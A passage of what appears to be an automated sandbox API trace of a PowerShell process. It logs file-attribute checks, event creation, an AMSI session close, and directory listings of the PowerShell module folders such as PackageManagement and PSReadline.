"c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1e33970a8b0 | out: lpFileInformation=0x1e33970a8b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0171.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3c0) returned 1 [0171.115] ReleaseMutex (hMutex=0x87c) returned 1 [0171.115] CoCreateGuid (in: pguid=0xb156f8d428 | out: pguid=0xb156f8d428*(Data1=0xc7803443, Data2=0x9e46, Data3=0x4794, Data4=([0]=0xba, [1]=0x3f, [2]=0x5b, [3]=0x4f, [4]=0x89, [5]=0xe3, [6]=0x92, [7]=0xe0))) returned 0x0 [0171.116] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x73c [0171.116] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x9a8 [0171.116] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x638 [0171.116] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x9b0 [0171.116] SetEvent (hEvent=0x9b0) returned 1 [0171.116] SetEvent (hEvent=0x73c) returned 1 [0171.116] SetEvent (hEvent=0x9a8) returned 1 [0171.116] SetEvent (hEvent=0x638) returned 1 [0171.117] AmsiCloseSession () returned 0x7ffbe18d8068 [0171.117] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8f4 [0171.117] SetThreadUILanguage (LangId=0x0) returned 0x409 [0171.119] EtwEventActivityIdControl () returned 0x0 [0171.119] EtwEventActivityIdControl () returned 0x0 [0171.119] EtwEventActivityIdControl () returned 0x0 [0171.126] CoTaskMemAlloc (cb=0x20e) returned 0x1e351451d30 [0171.126] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1e351451d30, nSize=0x105 | out: lpBuffer="") returned 0x97 [0171.126] CoTaskMemFree (pv=0x1e351451d30) [0171.126] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0171.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0171.126] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0171.129] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0171.142] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0171.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0171.143] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0171.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0171.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0171.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0171.143] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0171.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0171.143] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144ff70 [0171.144] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1e35144ff70, nSize=0x105 | out: lpBuffer="") returned 0x97 [0171.144] CoTaskMemFree (pv=0x1e35144ff70) [0171.144] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0171.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0171.144] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0171.146] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0171.157] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0171.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0171.157] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0171.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0171.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0171.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0171.157] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb10 | out: lpFileInformation=0xb156f8cb10*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0171.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9f0) returned 1 [0171.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c940) returned 1 [0171.158] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c420, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0171.158] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0xb156f8c650 | out: lpFindFileData=0xb156f8c650*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b720 [0171.158] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.158] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0171.159] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0171.172] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0171.173] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0171.173] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0171.173] FindClose (in: hFindFile=0x1e35146b720 | out: hFindFile=0x1e35146b720) returned 1 [0171.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c870) returned 1 [0171.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c830) returned 1 [0171.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c940) returned 1 [0171.174] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8c420, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0171.174] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0xb156f8c650 | out: lpFindFileData=0xb156f8c650*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b7e0 [0171.175] FindNextFileW (in: hFindFile=0x1e35146b7e0, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.175] FindNextFileW (in: hFindFile=0x1e35146b7e0, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0171.175] FindNextFileW (in: hFindFile=0x1e35146b7e0, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0171.175] FindNextFileW (in: hFindFile=0x1e35146b7e0, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0171.176] FindNextFileW (in: hFindFile=0x1e35146b7e0, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0171.176] FindNextFileW (in: hFindFile=0x1e35146b7e0, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 0 [0171.176] FindClose (in: hFindFile=0x1e35146b7e0 | out: hFindFile=0x1e35146b7e0) returned 1 [0171.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c870) returned 1 [0171.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c830) returned 1 [0171.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.177] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8c290, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0171.177] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0xb156f8c4c0 | out: lpFindFileData=0xb156f8c4c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b000 [0171.177] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.177] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0171.177] FindNextFileW (in: hFindFile=0x1e35146b000, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0171.177] FindClose (in: hFindFile=0x1e35146b000 | out: hFindFile=0x1e35146b000) returned 1 [0171.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0171.178] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0xb156f8c290, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0171.178] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0xb156f8c4c0 | out: lpFindFileData=0xb156f8c4c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146ae20 [0171.178] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.178] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0171.178] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0171.178] FindClose (in: hFindFile=0x1e35146ae20 | out: hFindFile=0x1e35146ae20) returned 1 [0171.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0171.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0171.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0171.179] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8c100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0171.179] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0xb156f8c330 | out: lpFindFileData=0xb156f8c330*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b720 [0171.179] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.179] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, 